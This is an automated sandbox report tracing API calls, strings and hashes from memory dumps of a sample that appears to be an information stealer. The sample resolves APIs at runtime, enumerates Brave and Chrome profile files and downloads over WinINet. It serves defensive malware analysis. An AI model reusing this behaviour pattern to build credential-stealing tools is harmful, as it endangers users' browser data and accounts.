LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Uniqueness

Uniqueness Score: -1.00%

Function 004093FC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: D5ft_dAZwUuL52qmUM1rPffT.exePID: 7664, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00CC42F8), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,00CC45B8), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,00CE2BF8), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,00CE2B80), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,00CE2B98), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,00CE2C28), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,00CC8ED0), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,00CE2C40), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,00CE5AA8), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,00CE5B80), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,00CE5B20), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,00CC47F8), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,00CC4858), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,00CC45D8), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,00CC4538), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,00CE5CD0), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,00CE5B68), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,00CC8D90), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,00CC47D8), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,00CE5D60), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,00CE5C28), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,00CE5A90), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,00CE5B98), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,00CC4818), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,00CE5D00), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,00CE5CE8), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,00CE5C58), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,00CE5CB8), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,00CE5C40), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,00CE5C10), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,00CE5C70), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,00CE5C88), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,00CE5B38), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,00CC88A0), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,00CE5CA0), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,00CE5D18), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,00CC4638), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,00CE5D48), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,00CC44D8), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,00CE5BF8), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,00CE5B50), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,00CC4798), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,00CC4718), ref: 0041665B
LoadLibraryA.KERNEL32(00CE5AC0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(00CE5D30,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(00CE5AD8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(00CE5A78,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(00CE5AF0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(00CE5BC8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(00CE5BE0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(00CE5B08,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,00CC4678), ref: 0041670A
GetProcAddress.KERNEL32(75290000,00CE5BB0), ref: 00416722
GetProcAddress.KERNEL32(75290000,00CE2CA8), ref: 0041673A
GetProcAddress.KERNEL32(75290000,00CE5DD8), ref: 00416753
GetProcAddress.KERNEL32(75290000,00CC4698), ref: 0041676B
GetProcAddress.KERNEL32(734C0000,00CC8DE0), ref: 00416790
GetProcAddress.KERNEL32(734C0000,00CC4838), ref: 004167A9
GetProcAddress.KERNEL32(734C0000,00CC8EF8), ref: 004167C1
GetProcAddress.KERNEL32(734C0000,00CE5E38), ref: 004167D9
GetProcAddress.KERNEL32(734C0000,00CE5DF0), ref: 004167F2
GetProcAddress.KERNEL32(734C0000,00CC4738), ref: 0041680A
GetProcAddress.KERNEL32(734C0000,00CC47B8), ref: 00416822
GetProcAddress.KERNEL32(734C0000,00CE5D78), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,00CC46F8), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,00CC46B8), ref: 00416874
GetProcAddress.KERNEL32(752C0000,00CE5E08), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,00CE5E20), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,00CC44B8), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,00CC8E08), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,00CC8F20), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,00CE5D90), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,00CC44F8), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,00CC45F8), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,00CC8C28), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,00CE5DA8), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,00CC4518), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,00CE2DF8), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,00CE5DC0), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,00CE63C0), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,00CC4558), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,00CC4578), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,00CE6180), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,00CE6198), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,00CC4618), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,00CE62B8), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,00CE63D8), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,00CE6408), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,00CE6270), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,00CC4598), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,00CC4658), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,00CC46D8), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,00CE61C8), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,00CC4758), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,00CC4778), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,00CE6B68), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,00CE6378), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,00CE6B88), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,00CE6C48), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,00CE6D28), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,00CE6CC8), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,00CE61B0), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,00CE2DD8), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,00CE6330), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,00CE61E0), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,00CE6BE8), ref: 00416C96
GetProcAddress.KERNEL32(6CB10000,00CE6300), ref: 00416CB7
GetProcAddress.KERNEL32(6CB10000,00CE6BA8), ref: 00416CCF
GetProcAddress.KERNEL32(6CB10000,00CE61F8), ref: 00416CE8
GetProcAddress.KERNEL32(6CB10000,00CE6210), ref: 00416D00

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\*, xrefs: 0041165D
%s\%s\%s, xrefs: 004117DB
%s%s, xrefs: 00411838
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: a6822badcbe3298d9434f410ef7729672a9ab2985fee6522a28d59bf66dcc808
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: a6822badcbe3298d9434f410ef7729672a9ab2985fee6522a28d59bf66dcc808
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 658A35A0 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6592F688,00001000), ref: 658A35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 658A35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 658A35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 658A363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 658A369F
__aulldiv.LIBCMT ref: 658A36E4
QueryPerformanceCounter.KERNEL32(?), ref: 658A3773
EnterCriticalSection.KERNEL32(6592F688), ref: 658A377E
LeaveCriticalSection.KERNEL32(6592F688), ref: 658A37BD
QueryPerformanceCounter.KERNEL32(?), ref: 658A37C4
EnterCriticalSection.KERNEL32(6592F688), ref: 658A37CB
LeaveCriticalSection.KERNEL32(6592F688), ref: 658A3801
__aulldiv.LIBCMT ref: 658A3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 658A3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 658A3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 658A394C

Strings

QPC, xrefs: 658A38FC
AuthcAMDenti, xrefs: 658A3946
GenuntelineI, xrefs: 658A3639
GTC, xrefs: 658A3912
O'/, xrefs: 658A35AC
MOZ_TIMESTAMP_MODE, xrefs: 658A35DB

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$O'/
API String ID: 301339242-1592252052
Opcode ID: 78684fa3c2a5cd1459c92a850536f5f2974779d1c046abf37263c8ffa16de44f
Instruction ID: 25b1c8f40c0577c551039559bc3e0e814c8fa6304bd3b653fc90a8c7fadc82ea
Opcode Fuzzy Hash: 78684fa3c2a5cd1459c92a850536f5f2974779d1c046abf37263c8ffa16de44f
Instruction Fuzzy Hash: 93B1A472A2C3159FDB08DF28C44561AB7E6FB8A704F04892EE899D7790DF709D048B82

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Google Chrome, xrefs: 0040BDB9
Preferences, xrefs: 0040B8BE
\Brave\Preferences, xrefs: 0040B97B
Brave, xrefs: 0040B8A2

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 3f7310237725cffc7918ad66329beb0a65cb6464536d379060688292de00be6d
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 3f7310237725cffc7918ad66329beb0a65cb6464536d379060688292de00be6d
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 0041264F
%s\%s, xrefs: 004125FE
%s\*, xrefs: 0041257D

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 3deb801023249600ec092a7752e31bd61345d11a5557b44307c70ad0692934d2
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 3deb801023249600ec092a7752e31bd61345d11a5557b44307c70ad0692934d2
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 3985592cc6b11c4526f1468e1e851999ac89c8fcd900962a6823546d1b9b0580
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 3985592cc6b11c4526f1468e1e851999ac89c8fcd900962a6823546d1b9b0580
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
